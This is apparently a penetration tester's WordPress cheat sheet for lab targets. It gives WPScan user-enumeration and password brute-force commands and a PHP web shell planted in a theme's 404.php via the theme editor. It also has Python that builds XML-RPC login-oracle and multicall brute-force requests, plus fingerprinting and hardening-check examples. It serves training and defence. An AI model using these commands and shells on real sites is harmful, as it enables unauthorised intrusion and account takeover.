Programmerboy Pentesting Stuff

Wordpress Pentesting

WordPress Structure

.
├── index.php
├── license.txt
├── readme.html
├── wp-activate.php
├── wp-admin
├── wp-blog-header.php
├── wp-comments-post.php
├── wp-config.php
├── wp-config-sample.php
├── wp-content
├── wp-cron.php
├── wp-includes
├── wp-links-opml.php
├── wp-load.php
├── wp-login.php
├── wp-mail.php
├── wp-settings.php
├── wp-signup.php
├── wp-trackback.php
└── xmlrpc.php

WordPress User Roles

There are five roles in a standard single-site WordPress installation (Multisite adds a sixth, Super Admin, above them).

Role            Description
Administrator   Full control of the site: add and delete users and posts, install plugins and themes, and edit theme and plugin source files through the built-in editor. This is the role that turns a stolen password into code execution (see RCE using ThemeEditor below).
Editor          Can publish and manage posts, including the posts of other users.
Author          Can publish and manage only their own posts.
Contributor     Can write and manage their own posts but cannot publish them.
Subscriber      Normal users who can read posts and edit their own profile.

WPScan

Basic Scan

wpscan --url http://127.0.0.1

Enumerate Plugins using WPScan

wpscan --url http://94.237.49.182:58555/ --enumerate ap

ap enumerates all plugins WPScan can find; vp limits the output to plugins with known vulnerabilities (which needs an API token), and at / vt do the same for themes.

Enumerate Users using WPScan

wpscan --url http://94.237.49.182:58555/ --enumerate u

User enumeration needs no credentials: WPScan reads author archives (/?author=N), the REST API (/wp-json/wp/v2/users) and the login form's error messages, all of which leak valid usernames by default.

WPScan Aggressive Mode Plugins

wpscan --url http://blog.inlanefreight.local -e ap --no-banner --plugins-detection aggressive --plugins-version-detection aggressive --max-threads 60
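What the passive and aggressive plugin detection above actually do, shown as an added example written for this page (it is not WPScan's code): the passive part reads plugin and theme slugs plus their ?ver= hints out of HTML the site has already served, and the aggressive follow-up requests each plugin's readme.txt and reads its Stable tag, which is a far more reliable version than the asset hint. The HTML, the readme text and the host blog.example are constructed for the example, not captured from a real site.

```python
"""Passive WordPress fingerprinting from page source (added example, not WPScan code)."""
import re
from typing import Dict, List, Optional

# Constructed page source in the shape WordPress emits (not captured traffic).
SAMPLE_HTML = """<html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel='stylesheet' href='http://blog.example/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.6' />
<script src='http://blog.example/wp-content/plugins/example-gallery/js/gallery.js'></script>
<link rel='stylesheet' href='http://blog.example/wp-content/themes/twentyseventeen/style.css?ver=3.4' />
<script src='http://blog.example/wp-includes/js/jquery/jquery.min.js?ver=3.7.1'></script>
</head><body></body></html>"""

# Constructed readme.txt in the format the WordPress plugin directory requires.
SAMPLE_README = """=== Contact Form 7 ===
Contributors: example
Requires at least: 6.2
Tested up to: 6.4
Stable tag: 5.8.6
"""

GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([\d.]+)', re.I)
# /wp-content/<plugins|themes>/<slug>/<path>[?ver=X]<closing quote>
ASSET_RE = re.compile(
    r'/wp-content/(plugins|themes)/([a-z0-9_-]+)/[^\s"\'<>]*?(?:\?ver=([\w.-]+))?["\']', re.I)
STABLE_TAG_RE = re.compile(r'^Stable tag:\s*([\w.-]+)', re.I | re.M)


def fingerprint(html: str) -> Dict[str, object]:
    """Return the core version plus {slug: version-or-None} for plugins and themes.

    The ?ver= hint is low confidence: many plugins enqueue assets with the
    WordPress core version instead of their own, which is why the aggressive
    readme.txt check exists.
    """
    core = GENERATOR_RE.search(html)
    found: Dict[str, Dict[str, Optional[str]]] = {"plugins": {}, "themes": {}}
    for kind, slug, ver in ASSET_RE.findall(html):
        bucket = found[kind.lower()]
        # Keep the first version seen; an asset without ?ver must not erase it.
        if slug not in bucket or (bucket[slug] is None and ver):
            bucket[slug] = ver or None
    return {"core": core.group(1) if core else None, **found}


def readme_urls(base: str, slugs: List[str]) -> List[str]:
    """The URLs an aggressive version check requests, one per plugin slug."""
    return [f"{base.rstrip('/')}/wp-content/plugins/{slug}/readme.txt" for slug in slugs]


def parse_stable_tag(readme: str) -> Optional[str]:
    """Version from a plugin readme.txt ('trunk' means no tagged release); None if absent."""
    m = STABLE_TAG_RE.search(readme)
    return m.group(1) if m else None


if __name__ == "__main__":
    fp = fingerprint(SAMPLE_HTML)
    print("core:", fp["core"])
    print("plugins:", fp["plugins"])
    print("themes:", fp["themes"])
    for url in readme_urls("http://blog.example", list(fp["plugins"])):
        print("aggressive check ->", url)
    print("readme says:", parse_stable_tag(SAMPLE_README))
```

Passive detection only sees plugins that put an asset on the pages you fetched, so a plugin with no front-end assets is invisible to it; that is the gap --plugins-detection aggressive closes by requesting known plugin paths directly, at the cost of thousands of requests that any WAF or access log will notice.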

ALL in ONE WPSCAN Command

wpscan --url target.com --disable-tls-checks --api-token <api-token> -e at,ap,u --plugins-detection aggressive --force

-e takes a single comma-separated list (at = all themes, ap = all plugins, u = users) rather than repeated flags. --api-token lets WPScan look up known vulnerabilities for every version it identifies (the free tier is rate-limited per day), --force skips the check that the target is actually WordPress, and --disable-tls-checks ignores certificate errors on lab hosts.

Normal WPSCAN Bruteforce Attack

wpscan --url http://example.com --passwords /usr/share/wordlists/rockyou.txt

With no -U / --usernames given, WPScan first enumerates users and then tries the wordlist against every account it found, using the wp-login method by default. -P is the short form of --passwords.

BruteForce attack using WPScan

WPScan can brute force passwords for known usernames. In the lab the user enumeration above returned three accounts (admin, roger and david); the command below targets two of them. The attack method is chosen with --password-attack: wp-login posts each guess to the normal login form, while xmlrpc sends each guess as a wp.getUsersBlogs call to /xmlrpc.php, which is lighter and therefore faster. A third mode, xmlrpc-multicall, bundles many guesses into a single system.multicall request; WordPress 4.4 and later stop checking the remaining credentials in a multicall after the first failure, so that amplification mainly pays off against old installs. The xmlrpc modes only work while xmlrpc.php is enabled and the relevant methods are allowed; otherwise fall back to wp-login. Usernames are passed as a comma-separated list without spaces, and -t is the short form of --max-threads; keep it conservative on a real engagement, since failed logins are logged and many sites lock accounts or rate-limit.

wpscan --password-attack xmlrpc -t 20 -U admin,david -P /usr/share/wordlists/rockyou.txt --url http://blog.inlanefreight.com

RCE using ThemeEditor

This needs an Administrator account, and it only works while the built-in file editor is available: if wp-config.php defines DISALLOW_FILE_EDIT or DISALLOW_FILE_MODS as true, the menu entry is missing. Log in to the WordPress dashboard and open Appearance > Theme File Editor (Tools > Theme File Editor with a block theme; simply Editor on older versions).

Select a theme, open its 404 template (404.php) and paste a PHP reverse shell at the very top of the file,

or add the web shell below instead:

<?php
system($_GET['cmd']);
?>

Put the payload before the theme's own code: requesting the file directly runs it outside the WordPress bootstrap, so any WordPress function the template calls (get_header() and friends) would fatal before reaching code placed further down.

Click Update File, then request the edited file directly, substituting the directory name of the theme you edited, and pass the command to run:

http://<target>/wp-content/themes/twentyseventeen/404.php?cmd=id

The response contains the output of id, confirming RCE as the web server user. Restore the original template once the engagement is over.
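The defensive counterpart of the attack above, as an added example written for this page (not WordPress code): a check of whether a given wp-config.php actually turns the file editor off. It matters because a define() that is commented out still looks like hardening to a casual grep, and because DISALLOW_FILE_MODS implies DISALLOW_FILE_EDIT (it also blocks plugin and theme installs and updates). Both config texts are constructed samples.

```python
"""Does this wp-config.php leave the theme/plugin file editor on? (added example)"""
import re
from typing import Dict

DEFINE_RE = re.compile(
    r"""define\s*\(\s*['"](DISALLOW_FILE_EDIT|DISALLOW_FILE_MODS)['"]\s*,\s*(true|false)\s*\)\s*;""",
    re.I)
BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
LINE_COMMENT_RE = re.compile(r"^\s*(?://|#).*$", re.M)


def strip_comments(php: str) -> str:
    """Drop /* */ blocks and whole-line // or # comments, so a commented-out
    define('DISALLOW_FILE_EDIT', true) is not mistaken for a live setting.
    Trailing comments after code are left alone, so URLs inside strings survive."""
    php = BLOCK_COMMENT_RE.sub("", php)
    return LINE_COMMENT_RE.sub("", php)


def file_constants(config: str) -> Dict[str, bool]:
    """{'DISALLOW_FILE_EDIT': bool, 'DISALLOW_FILE_MODS': bool} for constants actually defined."""
    return {name.upper(): value.lower() == "true"
            for name, value in DEFINE_RE.findall(strip_comments(config))}


def theme_editor_enabled(config: str) -> bool:
    """WordPress defaults to enabled; either constant set to true turns the editor off."""
    consts = file_constants(config)
    return not (consts.get("DISALLOW_FILE_EDIT", False) or consts.get("DISALLOW_FILE_MODS", False))


# Constructed sample: editor still on, because the hardening line is commented out.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'example-only' );
// define( 'DISALLOW_FILE_EDIT', true );
/* That's all, stop editing! Happy publishing. */
require_once ABSPATH . 'wp-settings.php';
"""

# Constructed sample: hardened, editor off and file modifications blocked.
HARDENED_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DISALLOW_FILE_EDIT', true );
define( 'DISALLOW_FILE_MODS', true );
require_once ABSPATH . 'wp-settings.php';
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{label}: theme editor enabled = {theme_editor_enabled(cfg)}")
```

Run it against a copy of the target's wp-config.php (read via a file read primitive, a backup left in the webroot, or during a configuration review) to know in advance whether the theme editor path is open; from the defender's side, DISALLOW_FILE_EDIT is the single cheapest change that removes this admin-to-RCE step.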

XMLRPC.php

Note that xmlrpc.php being reachable is not a vulnerability in itself. What matters is which methods the instance allows (system.listMethods returns the list), because some of them enable enumeration and brute force.

With a valid username and password (here the admin user) wp.getUsersBlogs returns the blogs that account can access, which makes it a convenient credential check. Wrong credentials come back as faultCode 403 with the string "Incorrect username or password.", so the same call is the oracle behind the xmlrpc brute-force mode above.

curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>admin</value></param><param><value>CORRECT-PASSWORD</value></param></params></methodCall>" http://blog.inlanefreight.com/xmlrpc.php
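The XML-RPC exchange behind both the brute-force section and the curl request above, as an added example written for this page (not WPScan's or WordPress's code): it builds the system.listMethods, wp.getUsersBlogs and system.multicall request bodies with the standard library and classifies the responses, so it runs offline. The host blog.example is a placeholder and the three sample responses are constructed in the shape WordPress returns, not captured traffic.

```python
"""Build and parse WordPress XML-RPC login-oracle traffic offline (added example)."""
import xmlrpc.client
from typing import List

ENDPOINT = "http://blog.example/xmlrpc.php"  # placeholder, not a real target

# Minimal copy of the struct wp.getUsersBlogs returns per blog (constructed).
_BLOG = {"isAdmin": True, "url": "http://blog.example/", "blogid": "1",
         "blogName": "Example Blog", "xmlrpc": ENDPOINT}


def build_list_methods() -> str:
    """system.listMethods: learn which methods the endpoint exposes before attacking."""
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def build_login_check(user: str, password: str) -> str:
    """wp.getUsersBlogs requires valid credentials, so it doubles as a login oracle."""
    return xmlrpc.client.dumps((user, password), methodname="wp.getUsersBlogs")


def build_multicall(user: str, passwords: List[str]) -> str:
    """Pack many wp.getUsersBlogs calls into one system.multicall request
    (the xmlrpc-multicall attack mode: many guesses per HTTP round trip)."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_list_methods(xml: str) -> List[str]:
    (methods,), _ = xmlrpc.client.loads(xml)
    return list(methods)


def parse_login_response(xml: str) -> bool:
    """True if the response is a blog list; False on the fault WordPress sends
    for bad credentials (faultCode 403, 'Incorrect username or password.')."""
    try:
        xmlrpc.client.loads(xml)
    except xmlrpc.client.Fault:
        return False
    return True


def parse_multicall_response(xml: str, passwords: List[str]) -> List[str]:
    """Return the passwords whose call succeeded. Per the multicall convention a
    failed call is a struct with faultCode/faultString and a successful call is a
    one-element array holding the method's return value. On WordPress 4.4+ every
    entry after the first failure is a fault without being checked."""
    (outcomes,), _ = xmlrpc.client.loads(xml)
    hits = []
    for pw, outcome in zip(passwords, outcomes):
        if isinstance(outcome, dict) and "faultCode" in outcome:
            continue
        hits.append(pw)
    return hits


# Constructed responses in the shape WordPress produces (not captured traffic).
SAMPLE_METHODS = xmlrpc.client.dumps(
    (["system.multicall", "system.listMethods", "wp.getUsersBlogs", "wp.getPosts"],),
    methodresponse=True)
SAMPLE_LOGIN_OK = xmlrpc.client.dumps(([_BLOG],), methodresponse=True)
SAMPLE_LOGIN_BAD = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True)
SAMPLE_MULTICALL = xmlrpc.client.dumps(
    ([{"faultCode": 403, "faultString": "Incorrect username or password."},
      [[_BLOG]],
      {"faultCode": 403, "faultString": "Incorrect username or password."}],),
    methodresponse=True)

if __name__ == "__main__":
    print(build_login_check("admin", "CORRECT-PASSWORD"))
    print("methods:", parse_list_methods(SAMPLE_METHODS))
    print("good creds:", parse_login_response(SAMPLE_LOGIN_OK),
          "bad creds:", parse_login_response(SAMPLE_LOGIN_BAD))
    print("multicall hits:", parse_multicall_response(SAMPLE_MULTICALL, ["wrong1", "right", "wrong2"]))
```

To use it against a live host, POST the string from build_login_check() or build_multicall() to ENDPOINT with Content-Type text/xml and feed the body back into the matching parse function; if parse_list_methods() shows neither system.multicall nor wp.getUsersBlogs, the xmlrpc attack modes will not work and wp-login is the only option.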